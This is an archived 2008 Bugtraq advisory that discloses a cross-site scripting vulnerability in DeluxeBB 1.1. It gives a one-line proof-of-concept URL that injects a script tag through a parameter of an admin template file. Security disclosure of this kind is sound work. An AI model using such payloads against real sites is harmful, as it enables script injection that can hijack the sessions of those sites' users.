| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <200801221807.53801.nbbn@gmx.net>
Date: Tue, 22 Jan 2008 18:07:53 +0100
From: nbbn@....net
To: bugtraq@...urityfocus.com
Subject: DeluxeBB 1.1 XSS Vulnerabilitie
########################################################
#Founded: 21, January 2008
#Autor: NBBN
#Type: XSS
#DeluxeBB Version: 1.1
#Register Globals: ON
#Magic Quotes; OFF
########################################################
poc:
http://www.site.tld/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script>